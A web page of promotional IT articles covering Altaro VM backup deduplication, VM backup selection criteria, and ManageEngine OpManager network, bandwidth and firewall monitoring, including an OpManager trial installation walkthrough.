Inline Deduplication is an intelligent form of deduplication because it usually runs deduplication algorithms (processing) as the data is being sent to the target storage device. In some cases, the data is processed before it is sent along the wire.

inline deduplication process

In these scenarios, you can benefit from a target storage device with a lower storage capacity than traditionally required, reducing your backup storage target costs. Depending on the type of data being backed up and the efficiency of the deduplication technology by your vendor, savings can range significantly.

Consider a scenario where you are backing up the same operating system a hundred or more times, deduplication savings would expected to be quite good.

Since inline deduplication does not run on the target storage device, the performance degradation on the device is typically lower than other methods. This corresponds to higher throughput available for more backups to run sequentially, allowing for your VM backups to complete within scheduled backup windows.

The main benefits of inline-deduplication are that your target storage device can have a lower capacity than originally required, additional similar workloads will not add much data to the target and the storage target performance is better than when using other deduplication options. You also benefit from less disk wear which can cause a problem with both HDD and SSD drive types.

One of the drawbacks though is that depending on the implementation, in-line deduplication might not deduplicate your VM job’s worth of data across all data on the target storage array. The implementation could be on a per VM or per-job basis resulting in lower deduplication benefits than other methods.

Augmented Inline Deduplication

Augmented in-line deduplication is an implementation of in-line deduplication used by Altaro’s VM backup solution.

In this implementation, variable block sizes are used to maximise deduplication efficiency. This is all achieved with very low memory and CPU requirements, resulting in extra space for more backups in less space than without any deduplication in place.

deduplication and compression

Another important consideration here is that less bandwidth is required to ship your VM backup data to the backup storage system. If your backup infrastructure is located in a different building or geographic location, bandwidth can get expensive. Now that data is deduplicated before it is sent across the wire, the bandwidth requirements are reduced significantly.

Altaro’s implementation is impressive because it’s a form of inline deduplication, promising deduplication across all backed up data.

In the graphic below we can see that data is shipped to a central backup target from various Virtual Machines. While this is happening, deduplication processes are running.

vm backup with augmented inline deduplication

The benefits of such a solution are clear;

  • Very Fast backups. There is no storage performance lost as there are no post-processes running on the storage target.
  • Excellent deduplication rates. Deduplication occurs between the source data and ALL data on the backup target. If the data is already in the backup storage device, it will not be copied to the destination storage again, saving space.
  • No operational overhead. There are no agents to install or manage. Installation of the feature is a simple checkbox.
  • No additional SSD or HDD wear on the target. Since there are no post-processes there is no “double touch” of the backed up data. This significantly reduces the wear on HDDs and SSDs resulting in fewer disk failures.

Deduplication Gotchas

If your backup software comes with deduplication as standard, then there is no reason to not use it? This statement is incorrect! You must consider the type of deduplication in use and the overall impact it has on your backup systems.

Software Interoperability

A key consideration when analysing backup solutions is feature interoperability. Some backup vendors will not support deduplication with other features. An example of this is a storage device which runs post-process deduplication combined with backup software that supports instant VM recovery.

Instant VM recovery, direct from the backup target can be a very beneficial feature for your business, however, you must ensure that the vendor supports this feature on deduplicated storage targets (if this is the type of system your business has in place.)

Performance

From a performance perspective, there is no point in having a smart deduplication system if it’s slowing your backups down to the point you cannot complete them. Be sure to trial deduplication features to correctly assess the performance impact on your platforms. Also ensure that there is little or no impact on production Virtual Machines. We know that post-process deduplication has no effect on production workloads, but it is possible that in-line can, so it should be tested.

A quick way to check performance would be to compare backup times before enabling deduplication features with afterwards. From here you can look at a cost-saving vs performance analysis to consider which is better for your business.

Disk Wear

Take a look the SMART data for your disks after enabling deduplication for an extended period of time. If the wear-out time on SSDs is significantly reduced, then consider an inline deduplication feature rather than post-process.

Operations

If enabling deduplication means installing, upgrading and generally managing agents everywhere, consider another solution which does not require agents. Agents will also consume CPU and Memory which can negatively impact the end-user experience of your applications.

For post-process deduplication ensure you are not limited to time windows for your backups and restores. Also, check the performance of this feature, especially on large backup targets.

The Impact of Augmented Inline Deduplication for VM backups

Deploying a VM backup solution that uses augmented inline deduplication is a great idea if you have limited space on an existing backup target. It’s also a good fit if you are looking at a more expensive SSD option, but do not want to stretch your IT budget to one that will natively store multiple copies of the same Virtual Machine.

An example of some of the storage savings can be seen in the below graphic:

altaro augmented inline deduplication

Most organizations have multiple Virtual Machines with the same operating system. A typical Windows Server can have around 20GB of data just for the Operating System. Consider 100’s of similar VMs with daily backups and long retention policies. The savings can be considerable.

Unlike physical machines, VMs do not usually require additional agents for deduplication or backups to run - there are some exceptions of course.

Summary

In this article we covered the basics on deduplication, analyzed Post-Process Deduplication, Inline Deduplication and Augmented Inline Deduplication. Further more, we explained the strengths and weakenesses of each deduplication method and provided examples on how organizations can leverage deduplication backups for their VM backups and save space and money.

To wrap-up, there are almost no reasons why a deduplication capable VM backup solution should be ignored when choosing your backup platform. There are some caveats depending on your business and technical requirements, but there are several options available to get started with deduplication.

Fortunately, for the most part, Altaro’s Augmented Inline Deduplication features are a good fit for most scenarios and are available at a competitive price point.

Remember, when selecting your VM backup solution, consider the limitations of the various kinds of deduplication and go with what works best for your business.

  • Hits: 11652

FREE Webinar - Fast Track your IT Career with VMware Certifications

Everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4,500!

Climbing the career ladder in the IT industry is usually dependent on one crucial condition: having the right certifications. If you’re not certified to a specified level in a certain technology used by an employer, that’s usually a non-negotiable roadblock to getting a job or even further career progression within a company. Understanding the route you should take, and creating a short, medium, and long term plan for your certification goals is something everyone working in the IT industry must do. In order to do this properly you need the right information and luckily, an upcoming webinar from the guys at Altaro has you covered!

Fast Track your IT Career with VMware Certifications is a free webinar presented by vExperts Andy Syrewicze and Luke Orellana on November 20th outlining everything you need know about the VMware certification world including costs, value, certification tracks, preparation, resources, and more.

Free vmware certification webinar

In addition to the great content being discussed, everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4.5k! This incredible giveaway is open to anyone over the age of 18 and all you need to do to enter is register and attend the webinar on November 20th! The winner will be announced the day after the webinar via email to registrants.

VMware VCP Certification is one of the most widely recognized and valued certifications for technicians and system administrators today however the hefty price tag of $4.5k puts it out of reach of many. The chance to get this course for free does not come along every day and should definitely not be missed!

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

  • Hits: 7026

6 Key Areas to Consider When Selecting a VM Backup Solution

vm backup considerationsBackup and Disaster recovery are core considerations for any business with an IT footprint, whether that is on-premises or in the cloud.

Your business depends on reliable IT systems to support the business's core functions. Even a short 1-hour outage can cause considerable disruption and have a financial impact to the business. Given our ever-growing reliance on IT systems, it is important more than ever to choose the right VM Backup software for your business to protect your Virtual Infrastructure (Vmware, Hyper-V) and business data in the case of a system failure or security incident while at the same time provide fast individual file or folder, server database or entire VM restoration.  

By utilizing Altaro VM Backup as a case study, this article will guide you through the following main 6 areas which you should consider when choosing your VM Backup solution:

Analyze Your Business Requirements

The most important part of electing a backup solution is to ensure that the solution will meet your requirements.

There are various requirements that you might have, a few examples are:

Number of Virtual Machines and Hosts

You need to ensure that the backup software is capable of handling the size of your virtualized estate. So if your total number of VM hosts is very large or changing constantly, then you might want to ensure that the solution is scalable and it is easy to add additional workloads into the platform.

Type of Backup Storage

Most backup solutions for a virtualized environment are software-based, meaning that they run on top of a Window Server installation or from within their own appliance which you deploy to your virtualized platform. Other options include a physical appliance with storage built-in.

If you already have storage infrastructure in place, ensure that your choice of backup solution allows connectivity to this backup target natively. If you are looking for a storage device for the backups, consider one which supports a simple standards that works over existing networking infrastructure such as NAS or SMB Network Share.

Specialist Features

Be sure to analyse any existing features that you are using or consider new ones as part of your backup solution selection process.

Some of the features to consider include:

Deduplication

Deduplication of the storage used at the target backup location can significantly reduce the amount of storage that is needed to host your backups. Check with your backup vendor what the average deduplication rates are and ensure you check any small print that is attached to any claims.

When we look at duplication from Altaro’s perspective, they rightfully boast how they can outperform event their closest competitors. With Altaro, you can backup 858GB of VM data into only 390GB of space. Imagine the backup storage costs savings there:

augmented inline deduplication example

Try Altaro's Free VM Backup Solution - Download Now

WAN Optimisation

If you are backing up your Virtual Machines to a secondary site, over a WAN connection then consider a solution which includes WAN Optimisation. Bandwidth isn’t free which is how WAN optimisation can help. Backup data is compressed.

In some better implementations, only data that the backup storage doesn’t already have will be sent over the WAN. This can drastically save your bandwidth and avoid “burst” costs by your ISP. WAN Optimization can also free up the link for other uses and applications.

Guest Quiescing

If you have databases which require backing up, then ensure your selected solution supports backing up of your databases type and version. In this scenario is not enough to backup Virtual Machines on their own. Typically for databases, an agent needs to be deployed to the machine which will instruct the database to flush all writes that are in memory to disk. If you don’t do this then there is a risk that the database will not restore correctly. Something to keep in mind is that with Altaro, Exchange, SQL and other applications only require VMware tools for VMware vSphere environment for guest quiescing. No additional agents are required.

vm backup - guest quiescing

Instant Restore

Instant restore is a more modern approach to restoring Virtual Machines. Some providers will allow you to instantly map the backup file to your systems so that you can get back online in seconds rather than waiting for several hours for a restore to complete.

Altaro aims to meet all of these business requirements through their VM Backup solution. Altaro supports all common storage types out of the box (Network Drive, NAS, iSCSI, eSATA and USB) with no advanced configuration required:

vm backup select backup location

Furthermore, all of the advanced features that you can think of are supported by Altaro VM Backup including Deduplication, WAN Optimisation, Guest Quiescing via VMware Tools and Instant Restore Technology to bring your backups online in just a few seconds, regardless of their size.

VM Backup - Billing Model & Price

There are various billing models out there these days. Most solutions will charge you a fee per server CPU or by the number of Virtual Machines. Then there is usually a maintenance fee on top which covers support and entitlement to new versions of the software.

With various options available, work out if a per CPU or per VM option is more advantageous for your business. This applies for the long term, so forecast this pricing out over 3 or 5 years. It might also be a good time to see if you can consolidate your Virtual Machines down onto fewer hosts and go for a host orientated option rather than per VM.

It would also be wise to look into deals on longer-term agreements and If you have a large estate, to see if there are discounts for signing up to a larger commitment.

Some vendors will offer an OPEX model rather than a fixed price upfront CAPEX solution. Paying monthly can help with budgets so check with your vendor about the options.

When we look at Altaro VM Backup, the billing model is simple; all you need is the number of hosts in your environment and the edition of the software you wish to purchase. 24/7 support upgrades are included for the first year too; you can purchase software maintenance agreements (SMA) for continued upgrade and Technik support in future years. Altaro does not bill you on the number of VMs or sockets so you can leverage a cost-saving over the competition here.

VM Backup – Security & Encryption

Security is a growing concern so don’t fall into the gap and forget about it when looking at your backup solution:

  • Check to ensure your chosen solution’s backups can put an air gap in place for your production Virtual Machines to prevent the spread of threats such as crypto-locker to your backups.
  • Do you need to encrypt your VM backups? This can slow down your backup jobs and prevent some features from working so ask your shortlisted vendors what the deal is here.
  • For ultra-security conscience businesses, you might want your backups to be encrypted as the data is sent down the network to your storage device. This can be advantageous, but there are sometimes cheaper options such as using a VPN or a dedicated VLAN to help protect you to a certain degree.
  • Backup software such as Altaro can use the inbuild Encryption feature which would encrypt all backups with an AES 256bit Encryption (Military Grade) hence preventing from having one encrypting backups manually and possibly rendering the backups not accessible even to the backup solution itself.

Try Altaro's Free VM Backup Solution - Download Now

Vendor Reputation

Before signing up to a contract with a backup vendor, ask yourself the  following questions

  • How long has the company been in business?
  • How many version of the software has been released?
  • Is the software supported by your virtualization vendor (VMware/ HyperV etc)?
  • How quickly does the backup vendor’s software support a recently released update from your Virtualization vendor?

For peace of mind, Altaro wins awards every year which are published on their website. They have over 30 awards to their name and a series of impressive independent reviews. Altaro also boast over 50,000 customers including:

altaro vm backup customers

Vendor Support

When things go wrong and you have to rely on your backup solution to save the day, you need to know that the vendor support is ready to help you should you need them. Here are some things to consider:

Support Reviews

Look online to see if there are any reviews on the solution you are looking at purchasing.

A quick google search should be all you need to see if there are any major issues with the software.

Service Level Agreements

When you receive your terms, review the support clauses to see if the SLAs are in line with your expectations. Ideally, you want the vendor to respond fairly quickly to your support requests especially if they are related to a restore.

Support Availability

For availability, the two main areas for consideration are:

  • Can you phone or email the support team?

Being able to call the support team is important because other methods such as email and chat are slow and might be triaged for several hours or misclassified into another severity level. Phone support is incredibly important when looking at your options.

  • Support hours

It always feels as though we need support at the worst possible time. Trying to get an application or Virtual Machine restore completed through the evening so that it is ready for the morning can be a challenge. With this in mind, we should try to choose a VM backup vendor that has a 24/7 helpdesk who you can call at any time and log a case.


One of the great things about Altaro is their support. They commit to responding to support calls in under 30 seconds. Guaranteed!

altaro customer support

Summary

This article helped identify the main considerations for your VM Backup solution to ensure business continiouity, data integrity, data availability and more. We talked about the importance of the number of VMs and Hosts supported by the VM backup, type of backup storage supported, advanced  storage space conservation techniques such as Augmented Inline Deduplication, WAN Optimization backup techniques to maximise your backups over WAN links, Guest Quiescing for database backups, Instant restore capabilities for fast restoration, VM Billing and Pricing models, VM Backup Security and encryption and vendor support.

We believe that Altaro fits the needs of most organisations due to their scalable, feature-rich solution. With an average call pickup of only 22 seconds, straight to a product expert with no gatekeepers in the way of your support experience is enough on its own for most to look at Altaro as a viable solution.

  • Hits: 10603
AIOPS for IT Operations

Artificial Intelligence For IT Operations (AIOps) - Why You Should Care (or not)

aiops for it operations introIn the rapidly evolving landscape of IT operations, organizations are increasingly turning to Artificial Intelligence for IT Operations (AIOps) to streamline their processes, enhance efficiency, and overcome the challenges of managing complex and dynamic IT environments.

AIOps combines artificial intelligence, machine learning, and big data analytics to deliver powerful insights and automation capabilities that drive transformative benefits. In this article we'll explore the significance of AIOps in the modern IT era.

Key Topics:

Download your free complete guide to Artificial Intelligence for IT Operations.

aiops abstract architectureAIOps abstract architecture (Free ManageEngine Whitepaper) - click to enlarge

Proactive Problem Resolution

AIOps enables organizations to move away from reactive approaches to IT management. By leveraging machine learning algorithms and advanced analytics, AIOps can identify patterns, anomalies, and potential issues in real-time. This proactive approach empowers IT teams to address problems before they impact end-users, improving system availability, and reducing mean-time-to-resolution.

aiops event noise filteringEvent noise filtering with the help of AIOps (Free ManageEngine Whitepaper)

Continue reading

  • Hits: 6876
ManageEngine Network Configuration Manager

Elevate your network management: Maximizing efficiency with ManageEngine Network Configuration Manager

ManageEngine Network Configuration ManagerAs technology evolves, so do our networks. Today's sprawling network infrastructures are intricate ecosystems, demanding more from IT teams than ever before.  Configuration management, compliance enforcement, and firmware & software updates are just a few of the growing requirements that strain manual processes.

While manual network management might have sufficed in simpler times, it hinders scalability in complex environments. It can also introduce security vulnerabilities and leave your network prone to human error.

To navigate this new reality, organizations need a better approach—they need to leverage a network configuration management tool.

Now, let's explore how a network configuration management tool can help revolutionize your modern network, unlocking a new era of scalability and security.

Key Topics:

Related articles:

Manual Configuration Management Challenges: Why a Configuration Management Tool is a Game-Changer

Continue reading

  • Hits: 1177
OpManager's Firewall Analyzer Add-on

Maximizing Network Security: A Deep Dive into OpManager's Firewall Analyzer Add-on

01 opmanager firewall analyzer introIn the rapidly evolving landscape of cyber threats, network security has never been more crucial. With the frequency and sophistication of cyberattacks escalating, organizations are under constant pressure to safeguard their networks. According to Sophos' The State of Ransomware 2023 report, 66% of organizations were hit by ransomware in 2023, and this trend is only going to keep growing with time. Additionally, Top10VPN estimates that VPN-related vulnerabilities increased by 47% in 2023. These statistics highlight the urgent need for robust network security solutions.

Traditional Network Monitoring: A Growing Inadequacy

Historically, network monitoring solutions have focused on tracking performance metrics, bandwidth usage, and basic security alerts. While these tools have been effective to an extent, the current cyberthreat landscape demands more advanced capabilities. Traditional monitoring is often reactive, identifying issues after they occur, which is no longer sufficient. As cyberthreats become more complex, there's a clear need for proactive, comprehensive security measures.

Introducing ManageEngine Firewall Analyzer

To address these growing challenges, a network security management tool like ManageEngine Firewall Analyzer is indispensable. Firewall Analyzer is a powerful tool designed to enhance firewall management and bolster network security. It provides detailed insights into firewall activity, monitors traffic, detects anomalies, and ensures compliance with security policies. By integrating seamlessly with ManageEngine OpManager, Firewall Analyzer serves as a comprehensive security management solution.

How Firewall Analyzer Bolsters OpManager

Firewall Analyzer is available as both a standalone product and an add-on for OpManager. When combined, these tools offer a powerful synergy that significantly enhances network security. Here is how:

  • Comprehensive Traffic Analysis: Firewall Analyzer provides detailed visibility into your network traffic. It analyzes inbound and outbound traffic to detect unusual patterns, potential threats, and bandwidth usage. This detailed analysis is crucial for preventing security breaches and optimizing network performance.

OpManager, Firewall Analyzer, ManageEngine, Network Security

Continue reading

  • Hits: 1363
OpManager Automated Faulty Handing Capabilities

Boost Network Security and Efficiency with Intelligent Notifications and Automated Fault Handling. Unified IT Operations Management Tool

OpManager - intelligent notifcations automated fault handingNetwork alerts are vital for maintaining your network's health, efficiency, and security, ensuring seamless daily operations. They act as an early warning system, alerting you to potential issues before they escalate into major problems. These alerts provide crucial insights into the performance and security of your network, enabling proactive measures to address minor faults before they turn into significant disruptions.

Ignoring the importance of a reliable network & security alerting system can lead to frequent disruptions, degraded network performance, compromised business operations, and security vulnerabilities, driving customers away or creating major problems in the smooth operation of your organization. Frequent disruptions can cause downtime, affecting productivity and leading to financial losses. Compromised business operations can damage your company's reputation, making it difficult to maintain customer trust and loyalty. Security vulnerabilities pose a risk of data breaches, resulting in the loss of sensitive information and legal consequences potential.

By implementing a dedicated system to monitor, manage, alert, and, your company can run smoothly and securely. This system ensures that any irregularities are promptly identified and addressed, minimizing downtime and resolve faults maintaining operational efficiency. It also enhances security by detecting and mitigating potential threats before they cause harm.

Key Topics

Discover how OpManager can transform and fully automate your network monitoring.

The Significance of Network & Security Alerts

A robust alerting system empowers your IT team to manage the network more effectively, allowing them to focus on strategic initiatives rather than constantly troubleshooting issues. For customers, it means a reliable and uninterrupted service experience, which is essential for building trust and satisfaction. Ultimately, a seamless, hassle-free experience for both your team and customers translates to improved business performance and a stronger competitive edge in the market.

Opmanager alarm overviewOpManager's Robust Alerting System - Click to enlarge

Let's consider a practical scenario involving a social media platform:

  • Event 1: Users experience sluggish app loading and multiple page crashes.
  • Event 2: IT admins see a significant boost in incoming traffic but nothing alarming or unusual.
  • Event 3: Users begin to send in reports and complaints once they observe an outage.
  • Event 4: The organization finally decides to look into the issue and ends up finding an anonymous malware attack that has been extracting the data of the platform's users.
  • Event 5: The attack intensifies, causing a loss of customer trust, data loss, a bad reputation, and more.
  • Event 6: The issue gets addressed, and normalcy is restored. However, the damage to the platform's reputation, reputation management, and getting the system back up have cost the company millions of dollars.

This could have been averted if only a network alerting tool was in place to detect, analyze, and fix the issue before it had disruptive impacts.

Let's discuss the impacts in detail.

Continue reading

  • Hits: 2037

Network Management Systems Help Businesses Accurately Monitor Important Application Performance, Infrastructure Metrics, Bandwidth, SLA Breaches, Delay, Jitter and more

Accurately monitoring your organization’s business application performance, service provider SLA breaches, network infrastructure traffic, bandwidth availability, Wi-Fi capacity, packet loss, delay, jitter and other important metrics throughout the network is a big challenge for IT Departments and IT Managers. Generating meaningful reports for management with the ability to focus on specific metrics or details can make it an impossible task without the right Network Management System.

The continuous demand for businesses network infrastructure to support, uninterrupted, more applications, protocols and services has placed IT departments, IT Managers and, subsequently, the infrastructure they manage, under tremendous pressure. Knowing when the infrastructure is reaching its capacity and planning ahead for necessary upgrades is a safe strategy most IT Departments try to follow.

The statistics provided by the Cisco Visual Networking (CVN) Index Forecast predict an exponential growth in bandwidth requirements the coming 5 years:

cisco visual networking index forecast

These types of reports, along with the exponential growth of bandwidth & speed requirements for companies of all sizes, raises a few important questions for IT Managers, Network Administrators and Engineers:

  • Is your network ready to accommodate near-future demanding bandwidth requirements?
  • Is your current LAN infrastructure, WAN and Internet bandwidth sufficient to efficiently deliver business-critical applications, services and new technologies such as IoT, Wi-Fi - 802.11n and HD Video?
  • Do you really receive the bandwidth and SLA that you have signed for with your internet service provider or are the links underutilized and you are paying for expensive bandwidth that you don’t need?
  • Do you have the tools to monitor network conditions prior to potential issues becoming serious problems that impact your business?

All these questions and many more are discussed in this article aiming to help businesses and IT staff understand the requirements and impact of these technologies on the organization’s network and security infrastructure.

We show solutions that can be used to help obtain important metrics, monitor and uncover bottlenecks, SLA breaches, security events and other critical information.

Key Topics:

Finally, we must point out that basic knowledge of the Networking and Design concepts is recommended for this article.

Click to Discover how a Network Management System can help Monitor your Network, SLAs, Delay Jitter and more.

Network Performance Metrics and their Bandwidth Impact

Network performance metrics vary from business to business and provide the mechanism by which an organization measures critical success factors.

The most important performance metrics for business networks are as follows:

  • Connectivity (one-way)
  • Delay (both round-trip and one-way)
  • Packet loss (one-way)
  • Jitter (one-way) or delay variation
  • Service response time
  • Measurable SLA metrics

Bandwidth is one of the most critical variables of an IT infrastructure that can have a major impact to all the aforementioned performance metrics. Bandwidth over saturated links can cause poor network performance with high packet loss, excessive delay, and jitter which can result in lost productivity and revenue, and increased operational costs.

New Applications and Bandwidth Requirements

This rapid growth for bandwidth affects the Enterprises and Service Providers which are continually challenged to efficiently deliver business-critical applications and services while running a network at optimum performance. The necessity for more expensive bandwidth solutions is one of the crucial factors that may have a major impact on a network and applications performance. Let’s have a quick look at the new technologies with high bandwidth needs which require careful bandwidth and infrastructure planning:

High Definition (HD) Video Bandwidth Requirements

This surpassed standard definition by the end of 2011. User demand for HD video has a major impact on a network due to the demanding bandwidth requirements as clearly displayed below:

dvd 720 1080p bandwidth requirements

DVD, 720p HD and 1080p HD bandwidth requirements:

  • (H.264) 720p HD video requires around 2,5 Mbps or twice as much bandwidth as (H.263) DVD
  • (H.264) 1080p HD video requires around 5Mbps or twice as much bandwidth as (H.264) 720p
  • Ultra HD 4320p video requires around 20Mbps or four times as much bandwidth as (H.264) 1080p

BYOD and 802.11ac Bandwidth Requirements

802.11ac is the next generation of Wi-Fi. It is designed to give enterprises the tools to meet the demands of BYOD access, high bandwidth applications, and the always-on connected user. The 802.11ac IEEE standard allows for theoretical speeds up to 6.9 Gbps in the 5-GHz band, or 11.5 times those of 802.11n!

Taking into consideration the growing trend and adoption of Bring-Your-Own-Device (BYOD) access, it won’t be long until multi-gigabit Wi-Fi speeds will become necessary.

Virtual Desktop Infrastructure (VDI) Bandwidth Requirements

Each desktop delivered over WAN can consume up to 1 Mbps bandwidth and considerably more when employees access streaming video. In companies with many virtual desktops, traffic can quickly exceed existing WAN capacity, noticeably degrading the user experience.

Cloud IP Traffic Statistics

The Annual global cloud IP traffic will reach 14.1 ZB (1.2 ZettaBytes per month) by the end of 2020, up from 3.9 ZB per year (321 ExaBytes per month) in 2015.
Annual global data center IP traffic will reach 15.3 ZB (1.3 ZB per month) by the end of 2020, up from 4.7 ZB per year (390 EB per month) in 2015. These forecasts are provided by the Cisco Global Cloud Index (GCI) which is an ongoing effort to forecast the growth of global data center and cloud-based IP traffic.

Application Bandwidth Requirements and Traffic Patterns

Bandwidth requirements and traffic pattern are not common among various applications and need careful planning as displayed below:

 Data, Video, Voice and VDI bandwidth requirements & traffic patterns

Data, Video, Voice and VDI bandwidth requirements & traffic patterns

An effective strategy is essential in order to monitor network conditions prior to potential issues becoming serious problems. Poor network performance can result in lost productivity, revenue, and increased operational costs. Hence, detailed monitoring and tracking of a network, applications, and users are essential in optimizing network performance.

Network Monitoring Systems (NMS) for Bandwidth Monitoring

An NMS solution needs to keep track of what is going on in terms of link bandwidth utilization and whether it is within the normal (baseline) limits. In addition, network and device monitoring helps network operators optimize device security either proactively or in a fast, reactive approach. Standard monitoring protocols such as Simple Network Management Protocol (SNMP) and NetFlow make the raw data needed to diagnose problems readily available. Finally, historical network statistics is an important input to the calculations when planning for a bandwidth upgrade.

SNMP can easily provide essential network device information, including bandwidth utilization. In particular, the NMS can monitor bandwidth performance metrics such as backplane utilization, buffer hits/misses, dropped packets, CRC errors, interface collisions, interface input/output bits, & much more periodically via SNMP.

Network devices can be monitored via SNMP v1, 2c, or 3 and deliver bandwidth utilization for both inbound and outbound traffic. XML-API can be used to monitor and collect bandwidth statistics information from supported devices such as the CISCO UCS Manager. In addition, Network maps with bandwidth utilization graphs can visualize the flow of bandwidth and spot bottlenecks at a glance.

Bandwidth issues reported by users regarding delays and slow response to applications cannot be identified with only SNMP based information. It needs technologies such as Cisco NBAR, Netflow, Juniper J-Flow, IPFIX, sFlow, Huawei NetStream or CBQOS to understand the bandwidth utilization across applications, users and devices. With these technologies, monitoring is possible to perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage.

Finally, performance thresholds and reporting topN devices with specific characteristics (TopN reporting) are useful, both for noticing when capacity is running out, and for easily correlating service slowness with stressed network or server resources. Those metrics can be the first indication of an outage, or of potential SLA deterioration to the point where it affects delivery of services.

ManageEngine OpManager12 NMS Features

OpManager is the NMS product offered by Manage Engine. OpManager can be easily installed and deployed, and provide all the visibility and control that you need over your network.

In brief, it offers the following main features:

  • Physical and virtual server monitoring
  • Flow-based bandwidth analysis
  • Firewall log analysis and archiving
  • Configuration and change management
  • IP address and switch port management

The tools mentioned below are needed for insight visibility of the bandwidth network performance. They can assist you to prepare your network for the deployment of new technologies and to measure the network performance indexes that we discussed in the previous sections. In particular, it offers the following tools to achieve complete network bandwidth visibility:

Bandwidth Monitoring: Tracks network bandwidth usage in real-time and provides info for the topN users consuming bandwidth on a network.

Router Traffic Monitoring: Continuously monitors networking devices using flows and generates critical information to ensure proper network bandwidth usage.

Cisco AVC Monitoring: in-depth visibility on the bandwidth consumption per application. Ensure business critical applications get maximum priority. Forecast future bandwidth needs and prepare your network before deploying new services and technologies.

Advanced Security Analytics Module: Detect threats and attacks using continuous Stream Mining Engine technology. This ensures high network security and a method to detect and eliminate network intruders.

Cisco IPSLA Monitoring: Monitor critical metrics affecting VoIP, HD Video performance, VDI and ensure best-in-class service levels. Ensure seamless WAN connectivity through WAN RTT monitoring.

Cisco NBAR Reporting: Recognize a wide variety of applications that use dynamic ports. Classify and take appropriate actions on business critical and non-critical applications.

ManageEngine OpManager-12 Trial Version Installation

The installation of OpManger12 trial version is discussed in this section. The installation is very simple and fast. We didn’t take more than 5 minutes to install it.

Two options are provided during the installation:

  • 30 days trial without any limitation to the number of the devices and interfaces
  • Free edition where you can monitor up to 10 devices

We installed the 30-day trial version. You can easily uninstall the trial version in less than 2 minutes after the product evaluation, by following the OpManager uninstall wizard. Let’s rock!

We start by downloading the Windows or Linux installation file of OpManager from the following link:

opmanager download

Downloading OpManager for Windows or Linux systems (Click to download)

Once downloaded run the file to initiate the Install Wizard which guides us through the installation process.

After accepting the license agreement it is necessary to select the installation mode to test the ManageEngine OpManager 12. We selected the 30 days trial version, which is more than enough for evaluation:

 opmanager installation trial free edition

Selecting between OpManager 30 Day Trial or Free Edition

Next, we select the language and path for the installation followed by the recommended ports required for OpManager. In particular, port 80 is the default server port of OpManager and port 9996 is the default port to listen for netflow packets. The ports can be easily changed during the installation.

 opmanager webserver and netflow ports

Selecting and changing OpManager WebServer and NetFlow ports

Next, we skip the Registration for Technical Support since we don’t require it for the evaluation of the product. OpManager will now commence its installation process.

When the file copy process is complete, we are prompted to select whether we are installing a Primary or Standby server. Redundancy is not required for our product evaluation:

 Selecting between Primary and Standby OpManager Installation

Selecting between Primary and Standby OpManager Installation

The next option allows the installation of OpManager using MSSQL or POSTGRESQL which is the fastest installation option. POSTGRESQL is bundled with the product and is a great option for evaluation cases:

 Selecting between OpManager with PostgreSQL or MSSQL

Selecting between OpManager with PostgreSQL or MSSQL

We managed to complete the installation process in less than 3 minutes!

As soon as we hit the Finish button, the initialization of the modules starts. Meanwhile we can take a quick look at the Readme file which includes useful information about the product.

OpManager launches in less than a minute after completing its initialization. The welcome tour introduces us to the main functionalities of the product:

 OpManager’s welcome tour

OpManager’s welcome tour

We are ready now to start working and discover this product. You can start by discovering your network devices. It is a powerful tool with plenty of capabilities.

 OpManager Network Device Discovery

OpManager Network Device Discovery

Selecting the overview tab from the left column we see (screenshot below) useful information about Network, Server, Virualization, Netflow, Network Configuration Management (NCM), Firewall and IP address Management (IPAM). All the essential components that should be monitored in a network:

NOTE: The single discovered device shown is by default the Server where OpManager is installed.

 OpManager discovered devices and network view

OpManager discovered devices and network view

All installed features and application add-ons enabled for the 30 day evaluation period are shown:

OpManager installed options and product details
OpManager installed options and product details

Summary

Bandwidth availability is a critical factor that has a major impact on a network and also affects application performance. The introduction of new IT technologies & policies, such as BYOD and HD-Video etc, requires careful planning, provisioning and monitoring by a sophisticated reputable NMS. The NMS should not only monitor bandwidth utilization but also perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage. OpManger12 is the NMS solution that includes all the tools for bandwidth and application monitoring by utilizing NBAR, Netflow, SNMP and XML-API technologies, helping IT Departments and IT Managers get centralized visibility of their network that was previously impossible.

  • Hits: 18645

Ensuring Enterprise Network Readiness for Mobile Users – Wi-Fi, Bandwidth Monitoring, Shadow IT, Security, Alerts

enterprise-network-monitoring-management-wifi-security-mobility-1aDemands for Enterprise networks to properly support mobile users is on a continuous rise making it more than ever necessary for IT departments to provide high-quality services to its users. This article covers 4 key-areas affecting mobile users and Enterprise networks: Wi-Fi coverage (signal strength – signal-to-noise ratio), Bandwidth Monitoring (Wi-Fi Links, Network Backbone, routers, congestion), Shadow IT (Usage of unauthorized apps) and security breaches.

Today, users are no more tied to their desktops/laptops. Now, they are mobile. They can reply to important business emails, access their CRM, collaborate with peers, share files with each other & much more from cafeteria or car parking. This implies that it's high time for network admins at enterprises to think or give equal importance to wireless networks similar to wired networks. Wireless networks should be equally faster and secure.

Though the use of mobile devices for business actives is a good thing to happen for both enterprises and its customers, it also has some drawbacks on the network management side. The top 4 things to consider to make your network mobile ready are:

  • Wi-Fi signal strength
  • Bandwidth congestion
  • Shadow IT
  • Security breaches and attacks

enterprise-network-monitoring-management-wifi-security-mobility-1Figure 1. OpManager Network Management and Monitoring - Click for Free Download

Wi-Fi Signal Strength

A good Wi-Fi signal is a must throughout the campus. Employees must not feel any connectivity problem or slowness because of poor signal quality. The signal should be so good and similar to the ones provided by the carriers. However, it’s not quite easy to maintain good signal strength all throughout the building. Apart from Wireless LAN Controller (WLC) and Wireless Access Point (WAP), channel interference also plays a major role in ensuring a good Wi-Fi signal strength.

RF interference is the noise or interference caused by other wireless & Bluetooth devices such as phones, mouse, remote controls, etc. that disrupts the Wi-Fi signal. Since all these devices operate on the same 2.4GHz to 5 GHz frequencies, it disrupts the Wi-Fi signal strength. When a client device receives another Wi-Fi signal it will defer transmission until the signal ceases. Interference that occurs during transmission also causes packet loss. As an effect Wi-Fi retransmissions take place which in fact slow down throughput and result in wildly fluctuating performance for all users sharing a given access point (AP).

Download your free copy of OpManager - Manage and Monitor your network

